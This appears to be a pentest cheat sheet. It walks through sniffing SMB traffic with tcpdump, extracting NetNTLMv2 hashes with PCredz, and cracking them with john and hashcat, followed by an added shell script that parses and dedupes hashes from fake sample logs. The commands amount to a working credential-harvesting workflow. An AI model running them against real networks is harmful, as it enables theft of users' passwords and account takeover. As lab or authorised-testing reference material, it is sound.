Pull Hashes PCredz

PCredz

Digs through pcap files and grabs hashes.

capture:
> tcpdump -nv -s0 -w /tmp/winauth.pcap port 445
-s0 means grab everything (whole packets, no truncation). More effective on older systems.

connect:
> smbclient //10.10.10.10/c$ Server1 -U bob

scan:
> cd /opt/PCredz/
> ./Pcredz -v -f /tmp/winauth.pcap

trim:
> cat CredentialsDump-Session.log
> grep bob CredentialsDump-Session.log | cut -d ' ' -f 5 | tee hash.txt
> cat hash.txt

crack:
> john hash.txt                       ..done!!
> hashcat -w 3 -a 0 -m 5600 hash.txt  ..done!!
> cat ~/.hashcat/hashcat.potfile

or (yuck) like this:
> hashcat -m 5600 --potfile-path ~/.hashcat/hashcat.potfile --show --outfile-format 2 hash.txt
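
A sturdier take on the trim step, as an added example that is not part of the original notes or of PCredz: instead of trusting field 5, it matches the NetNTLMv2 layout that hashcat mode 5600 expects (user::domain:16-hex challenge:32-hex proof:hex blob) wherever it sits on the line, and keeps one entry per account. The function names and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example. Function names and sample data are made up for illustration.

# extract_netntlmv2 LOGFILE [USER]
# Print each well-formed NetNTLMv2 string found anywhere in LOGFILE,
# one entry per user::domain pair, optionally limited to USER.
extract_netntlmv2() {
    log=$1
    user=${2:-}
    # user::domain:16-hex server challenge:32-hex NTProofStr:hex blob
    re='[^[:space:]:]+::[^[:space:]:]*:[0-9A-Fa-f]{16}:[0-9A-Fa-f]{32}:[0-9A-Fa-f]+'
    grep -oE "$re" "$log" |
        awk -F: -v u="$user" '
            u != "" && tolower($1) != tolower(u) { next }  # other accounts
            { key = tolower($1 "::" $3) }                  # user::domain
            !seen[key]++ { print }                         # first hit only
        '
}

# make_sample_log PATH
# Write a constructed log (layout is invented, values are fake) with the
# hash in different positions, a repeat account and a truncated entry.
make_sample_log() {
    cat > "$1" <<'EOF'
2024-01-01 10:00:00 tcp 445 hash: bob::CORP:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000deadbeef
2024-01-01 10:00:05 tcp 445 hash: bob::CORP:aabbccddeeff0011:00112233445566778899aabbccddeeff:0101000000000000deadbeef
2024-01-01 10:00:09 [445] alice::CORP:8877665544332211:ffeeddccbbaa99887766554433221100:0101000000000000cafef00d
2024-01-01 10:00:12 tcp 445 hash: bob::CORP:11223344:truncated
EOF
}

# Demo run on the constructed sample.
sample=$(mktemp)
make_sample_log "$sample"
extract_netntlmv2 "$sample" bob
rm -f "$sample"
```

Truncated or mangled entries never reach hash.txt this way, so a failed load in john or hashcat points at the capture rather than at the trim.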
